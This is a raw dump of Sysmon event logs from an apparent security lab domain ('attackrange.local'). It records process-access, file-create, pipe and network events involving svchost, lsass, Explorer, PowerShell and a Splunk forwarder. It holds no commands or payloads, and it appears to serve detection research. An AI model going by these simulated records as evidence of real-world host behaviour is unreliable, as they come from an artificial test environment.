08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RP
CRT4.dll+1ae1c 10341000x80000000000000001053971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:46.376{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x8000000000000000810029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:47.964{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BF770AC0A3048E6A1A02054074EBDA0,SHA256=D0C0664835B821EAFEB18157A8C9D8990742B4415446C79C7DA12C94E486E131,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054054Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.993{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DA4F97A1C06BB6A0F3AF2529FD8F816,SHA256=5F748AEAC079DFC110C7AAC06570932ABA43918DE69FEE359651A2C3B7B64701,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054053Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.993{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B7ECE222DC7423A14F8E471ADB8BB80A,SHA256=DBDCAF7697BB96A9EE9FC2B3D8BBADF435832B3CD39259EB17F7DB78E77B502B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054052Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.924{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3C603B8320AE7E1591B5BC52C6D7ADD,SHA256=D3C5415F2308CA681012F1D9A50ADF4C9576C1F59E29B850B70C4DA257525F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054051Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.924{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65DA1EE0F7F3DCF795EDDC9439BED0FC,SHA256=3581FAE1A2EBC7B391D34DB55027FB6D3A76C1211B3C15B5B0799C324C47C03B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054050Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.693{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3164F5F8B1C1F6A9551B236DABF325FA,SHA256=999895E55E71CC3D13987F7A836F839C45CE2CDA970A4C9A92E6F85B5191E06D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054049Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.677{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0DF27C3AD9F0BA29F441DA86DAFCA65,SHA256=8269428FB1AAB06A64ACAB5CB9DE326F39F83C2C152E79358EABEF0EC8DE6A83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:46.347{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57437-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001054048Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.445{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.445{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x80000000000000001054046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:05:47.393{466BC892-F7DB-60EB-DC7D-00000000CF01}4252\PSHost.132705507470853828.4252.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001054045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.361{466BC892-F7DB-60EB-DC7D-00000000CF01}4252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_2cgd4atj.dz1.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.361{466BC892-F7DB-60EB-DC7D-00000000CF01}4252ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_24cpbby1.i02.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001054043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.345{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_24cpbby1.i02.ps12021-07-12 08:05:47.345 10341000x80000000000000001054042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.308{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+5
1781 10341000x80000000000000001054038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:47.261{466BC892-F7DB-60EB-DC7D-00000000CF01}42524212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+44788|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
